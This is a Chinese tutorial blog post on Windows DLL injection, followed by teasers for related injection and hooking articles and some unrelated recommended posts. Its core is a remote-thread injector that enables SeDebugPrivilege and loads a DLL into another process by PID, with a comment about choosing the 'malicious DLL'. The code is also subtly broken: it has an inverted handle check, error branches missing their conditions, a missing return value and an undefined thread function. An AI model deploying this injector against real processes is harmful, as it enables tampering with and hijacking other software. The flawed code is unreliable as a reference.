DLL注入就是将dll粘贴到指定的进程空间中,通过dll状态触发目标事件

DLL注入的大概流程

https://uploader.shimo.im/f/CXFwwkEH6FPM0rtT.png!thumbnail?accessToken=eyJhbGciOiJIUzI1NiIsImtpZCI6ImRlZmF1bHQiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiJhY2Nlc3NfcmVzb3VyY2UiLCJleHAiOjE2MzUxNDc0MzAsImciOiJZUXRDRHBXVlJXamRKVjloIiwiaWF0IjoxNjM1MTQ3MTMwLCJ1c2VySWQiOjY5NDQ5MzgzfQ.HwHDdkHUMmhzDbU4xVTOauaQnL9Kxap6PdA19WOYoy0

DLL使用

必备函数

HINSTANCE LoadLibrary(

LPCTSTR lpLibFileName);

返回值】成功则返回模块句柄,失败返回NULL

流程

  • 创建一个DLL项目

    DLL代码 
    // dllmain.cpp : 定义 DLL 应用程序的入口点。
    
#include "pch.h"
    
#include<windows.h>
    
BOOL APIENTRY DllMain( HMODULE hModule,
    
					   DWORD  ul_reason_for_call,
    
					   LPVOID lpReserved
    
					 )
    
{
    
	switch (ul_reason_for_call)
    
	{
    
	case DLL_PROCESS_ATTACH: {
    
		MessageBox(NULL,TEXT("Hacker"),TEXT("DLL Inject"),MB_OK);
    
		HANDLE hThread = CreateThread(NULL, 0, ThreadProc, NULL, 0, NULL);
    
		CHAR ErrorCode[100];
    
		sprintf(ErrorCode,"%d",(int)GetLastError());
    
		MessageBox(NULL, (LPCWSTR)ErrorCode, TEXT("DLL Inject"), MB_OK);
    
		if (hThread) {
    
			MessageBox(NULL, TEXT("Success"), TEXT("DLL Inject"), MB_OK);
    
			CloseHandle(hThread);
    
		}
    
		break;
    
	}
    
	case DLL_THREAD_ATTACH:
    
	case DLL_THREAD_DETACH:
    
	case DLL_PROCESS_DETACH:
    
		break;
    
	}
    
	return TRUE;
    
}

  • 通过LoadLibrary动态调用DLL

    关键代码

    	HANDLE hModule = ::LoadLibrary("injectDll.dll");

  • 获取DLL中的函数

    FARPROC GetProcAddress(
    
HMODULE hModule,
    
LPCWSTR lpProcName);
    
Parameters

    将模块句柄和函数名传入,成功则返回目标函数句柄,失败返回NULL

远程线程注入

必备函数

	HANDLE CreateRemoteThread(

	  HANDLE hProcess,                          // handle to process

	  LPSECURITY_ATTRIBUTES lpThreadAttributes, // SD

	  SIZE_T dwStackSize,                       // initial stack size

	  LPTHREAD_START_ROUTINE lpStartAddress,    // thread function

	  LPVOID lpParameter,                       // thread argument

	  DWORD dwCreationFlags,                    // creation option

	  LPDWORD lpThreadId                        // thread identifier

	);


	//向指定进程的指定空间写入数据

	BOOL WriteProcessMemory(

	HANDLE hProcess,

	LPVOID lpBaseAddress,

	LPVOID lpBuffer,

	DWORD nSize,

	LPDWORD lpNumberOfBytesWritten );


```

//在指定进程中申请一片内存

LPVOID VirtualAllocEx(

  HANDLE hProcess,          // process to allocate memory

  LPVOID lpAddress,         // desired starting address

  SIZE_T dwSize,            // size of region to allocate

  DWORD flAllocationType,   // type of allocation

  DWORD flProtect           // type of access protection

);

```

```

// remoteInjectDLLTEST.cpp : Defines the entry point for the console application.

//

#include "stdafx.h"

#include<windows.h>

#include<cstdio>

VOID ShowError(PCHAR msg)

{

	printf("%s Error --Code:%d\n", msg, GetLastError());

}

BOOL InjectDll(DWORD dwPid,CHAR szDllName[]){

	HANDLE hProcess = NULL,hRemoteThread = NULL;

	HMODULE hKernel32 = NULL;

	DWORD dwSize = 0;

	LPVOID pDllPathAddr = NULL;

	PVOID pLoadLibraryAddr = NULL;

	BOOL bRet = FALSE;

	hProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwPid);

	if(hProcess){

		ShowError("OpenProcess");

		bRet = FALSE;

		goto exit;

	}

	//申请DLL名称的内存空间

	dwSize = strlen(szDllName) + 1;

	pDllPathAddr = VirtualAllocEx(hProcess,NULL,dwSize,MEM_COMMIT,PAGE_READWRITE); //在指定的进程中分配内存空间

	{

		ShowError("VirtualAllocEx");

		bRet = FALSE;

		goto exit;

	}

	// 把DLL完整路径名写入进程中

	if (!WriteProcessMemory(hProcess, pDllPathAddr, szDllName, dwSize, NULL))

	{

		ShowError("WriteProcessMemory");

		bRet = FALSE;

		goto exit;

	}

	hKernel32 = LoadLibrary("Kernel32.dll");

	{

		ShowError("LoadLibrary");

		bRet = FALSE;

		goto exit;

	}

	// 获取LoadLibraryA函数地址

	pLoadLibraryAddr = GetProcAddress(hKernel32, "LoadLibraryA");

	if (pLoadLibraryAddr == NULL)

	{

		ShowError("GetProcAddress ");

		bRet = FALSE;

		goto exit;

	}

	//创建远程线程进行DLL注入

	hRemoteThread = CreateRemoteThread(hProcess, NULL, 0,

					  (LPTHREAD_START_ROUTINE)pLoadLibraryAddr,

					   pDllPathAddr, 0, NULL);

	if (hRemoteThread == NULL)

	{

		ShowError("CreateRemoteThread");

		bRet = FALSE;

		goto exit;

	}

exit:

	if(hKernel32) FreeLibrary(hKernel32);

	if(hProcess) CloseHandle(hProcess);

	if(hRemoteThread) CloseHandle(hRemoteThread);

}

void enableDebugPriv()

{

	HANDLE hToken;

	LUID sedebugnameValue;

	TOKEN_PRIVILEGES tkp;

	if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))

	{

		return;

	}

	if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &sedebugnameValue))

	{

		CloseHandle(hToken);

		return;

	}

	tkp.PrivilegeCount = 1;

	tkp.Privileges[0].Luid = sedebugnameValue;

	tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

	if (!AdjustTokenPrivileges(hToken, FALSE, &tkp, sizeof tkp, NULL, NULL))

	{

		CloseHandle(hToken);

		return;

	}

}

int main(int argc, char* argv[])

{

	enableDebugPriv(); //Inhance Privilege

	InjectDll(788,"E:\\Code\\injectDll\\Release\\injectDll.dll"); //选择需要注入的进程,选中恶意DLL

	return 0;

}

```

【Reverse】DLL注入的更多相关文章

  1. Ring3下的DLL注入(NtCreateThreadEx + LdrLoadDll方式实现,可以注入系统进程)

    工具介绍及使用请移步:http://blog.csdn.net/sunflover454/article/details/50441014 本文首发在零日安全论坛:http://www.jmpoep. ...

  2. DLL注入

    最近的项目涉及了软件破解方面的知识,记录一下. 将dll注入另一个进程. // Inject.cpp : Defines the exported functions for the DLL appl ...

  3. [转]Dll注入经典方法完整版

    Pnig0s1992:算是复习了,最经典的教科书式的Dll注入. 总结一下基本的注入过程,分注入和卸载 注入Dll: 1,OpenProcess获得要注入进程的句柄 2,VirtualAllocEx在 ...

  4. 第22章 DLL注入和API拦截(2)

    22.4 使用远程线程来注入DLL 22.4.1 概述 (1)远程线程注入是指一个进程在另一个进程中创建线程,然后载入我们编写的DLL,并执行该DLL代码的技术.其基本思路是通过CreateRemot ...

  5. 第22章 DLL注入和API拦截(1)

    22.1 注入的一个例子(跨进程子类化窗口) ①子类化窗口可以改变窗口的行为,让发往该窗口的消息重新发到我们指定的过程来处理.但这种行为只能在本进程中(如A),对于从一个进程(如B)去子类化另一个进程 ...

  6. DLL注入之注册表

    0x00 唠叨 编写本系列文章纯属为了系统学习DLL注入的方法,所以很多方法可能已经过时,希望各位看官勿喷.当然若有更好的方法,希望不腻赐教.若本文有任何错的地方,也希望各位指正.谢谢! 0x01 适 ...

  7. c++实现dll注入其它进程

    DLL注入技术才具有强大的功能和使用性,同时简单易用,因为DLL中可以实现复杂的功能和很多的技术. 技术要点: 1.宿主进程调用LoadLibrary,就可以完成DLL的远程注入.可以通过Create ...

  8. DLL注入_拦截技术之Hook方式

    后卫大师教你进程注入 首先提一下,由于文章完全是我手写,所以打不了太多,请包含,由于我已经提供了源代码,所以我在这里详细讲一下理论,至于想看代码的下载代码就可以了.代码中关于注入的部分做了详细的注释. ...

  9. 反射Dll注入分析

    (源码作者:(HarmanySecurity)Stephen Fewer) 0x01  反射Dll注入的优点  1.反射Dll注入的主要优点是它没有以主机系统的任何方式(例如LoadLibrary和L ...

随机推荐

  1. uni-app视频组件设置圆角

    无法实现,建议写个image在中间位置加个播放按钮,点击播放跳转新页面只需要在跳转参数里面把视频链接加上,在onLoad里面获取视频链接,自动播放视频,很多app目前都是这样做的,关闭页面后视频会自动 ...

  2. vue的逆向传值(子传父)

    逆向传值:子组件传值给父组件叫做逆向传值  (是不v欸允许的,必须经过事件触发才能传值) 逆向传值步骤: 1.要传值必须先抛出,在接收 语法: this.$emit("event" ...

  3. sql sever 约束

    SQLServer中有五种约束,Primary Key约束.Foreign Key约束.Unique约束.Default约束和Check约束 1.Primary Key约束在表中常有一列或多列的组合, ...

  4. 【数据结构&算法】12-线索二叉树

    目录 前言 线索二叉树的概念 线索二叉树的实现 线索二叉树的寻点思路二 类双向链表参考图 参考代码 中序遍历线索化 前言 在<大话数据结构>P190 页中有一句话:其实线索二叉树,就等于是 ...

  5. GoLang设计模式15 - 策略模式

    策略模式是一种行为型设计模式.通过策略模式,可以在运行时修改一个对象的行为. 接下来仍然是通过例子来了解策略模式.比如说内存缓存,这是我们在开发中经常使用的东西,大家应该都有一定的了解,接下来就用内存 ...

  6. 实验1:SDN拓扑拓扑实验

    一.实验目的 能够使用源码安装Mininet: 能够使用Mininet的可视化工具生成拓扑: 能够使用Mininet的命令行生成特定拓扑: 能够使用Mininet交互界面管理SDN拓扑: 能够使用Py ...

  7. C#与dotNET项目想要另存为一个新项目sln文件丢了怎么办

    如下图所示,我想要另存一个工程,把 V4.4整个的项目另存为V4.5,我可以把解决方案文件(.sln)改名字,但是我没法把文件夹改名字,改了打开sln就说找不到. 很简单的一个思路是反正sln是多余的 ...

  8. CAP 5.2 版本发布通告

    前言 今天,我们很高兴宣布 CAP 发布 5.2 版本正式版,在这个版本中,我们主要致力于更好的优化使用体验以及支持新的 Transport,同时在该版本也进行了一些 bug 修复的工作. 自从 5. ...

  9. ipython和pip,模块安装方法

    先下载 pip-.tar.gz 解压文件 cmd进入这个加压后的文件 执行 python setup.py install 然后配置环境变量 把 python 下的 Scripts 文件目录添加到 P ...

  10. 【Linux】解压分卷压缩的zip文件

    例如linux.zip.001, linux.zip.002, linux.zip.003. 1. cat linux.zip* > linux.zip #合并为一个zip包. 2. unzip ...